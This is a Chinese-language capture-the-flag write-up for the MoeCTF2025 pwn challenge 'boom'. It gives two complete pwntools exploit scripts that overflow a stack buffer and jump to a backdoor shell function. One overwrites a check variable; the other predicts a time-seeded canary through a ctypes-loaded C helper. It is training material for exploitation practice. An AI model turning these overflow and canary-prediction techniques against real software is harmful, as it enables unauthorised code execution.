boom
.png)
main函数:
.png)
init函数:
.png)
题目有后门函数,看main函数,逻辑很简单,我们输入y,生成一个随机数放canary,v6变成1,然后有一个明显的栈溢出漏洞,然后会进入一个检查,我们要保证v6=0或者canary不变才能通过检查,由于我们栈溢出是一定会覆盖canary的,所以我们这里有两种解法
第一种,v6也在栈上,那我溢出时顺便把v6覆盖成0不就行了吗,很简单
ret = 0x40101a
backdoor = 0x401276
sla(b"Do you want to brute-force this system? (y/n)",b'y')
payload = flat([
b"A" * (0x90 - 0x4),
p32(0),
b"A" * 0x8,
ret,
backdoor
])
sla(b'Enter your message: ',payload)
p.interactive()
这里我们要用sendline,因为gets要看到\n才停止读取
第二种,由于我们可以看到init函数直接告诉了我们种子是time(0),由于是伪随机,那我们知道种子可以直接模拟生成随机数,这里我们先写一个c脚本模拟
#include <stdlib.h>
#include <time.h>
int get_canary()
{
int seed = time(0);
srandom(seed);
int canary = random() % 114514;
return canary;
}
然后编译成.so,这样我们才能在python脚本中用,这里由于本地和远程可能有时间上的偏差,种子是time(0)所以远程不通可以再试,而且覆盖v6和canary时注意都是四字节的,用p32
EXP:
from pwn import *
import sys
context(arch='amd64', os='linux')
file_name = './pwn'
#libc_name = './libc.so.6'
elf = ELF(file_name)
#libc = ELF(libc_name)
gdb_ = 1 if ('gdb' in sys.argv) else 0
switch = 1 if ('remote' in sys.argv) else 0
debug = 0 if ('deoff' in sys.argv) else 1
if switch:
target = '127.0.0.1'
port = 37651
p = remote(target, port)
else:
p = process(file_name)
if debug:
context(log_level='debug')
if gdb_ and switch == 0:
gdb.attach(p)
pause()
s = lambda data : p.send(data)
sa = lambda delim, data : p.sendafter(delim, data)
sl = lambda data : p.sendline(data)
sla = lambda delim, data : p.sendlineafter(delim, data)
r = lambda numb=4096 : p.recv(numb)
ru = lambda delim, drop=True : p.recvuntil(delim, drop)
rl = lambda : p.recvline()
lg = lambda name, data : log.success(name + ': ' + hex(data))
uu64 = lambda data : u64(data.ljust(8, b'\x00'))
# search = lambda s : next(libc.search(s if isinstance(s, bytes) else s.encode()))
# def init_libc(leak, offset, name='Libc'):
# if isinstance(offset, str):
# offset = libc.sym[offset]
# libc.address = leak - offset
# log.success(f"{name} Base: {hex(libc.address)}")
#################################################################################
import ctypes
lib = ctypes.CDLL('./getcanary.so')
canary = lib.get_canary()
lg('canary',canary)
ret = 0x40101a
backdoor = 0x401276
sla(b"Do you want to brute-force this system? (y/n)",b'y')
payload = flat([
b'A'*(0x90-0x14),
p32(canary),
b'A'*0x18,
ret,
backdoor
])
sla(b'Enter your message: ',payload)
p.interactive()
题目链接:
CTF-Writeups/MoeCTF2025/boom at main · Zenquiem/CTF-Writeups
boom
https://zenquietus.top/archives/wei-ming-ming-wen-zhang-spsQRWd8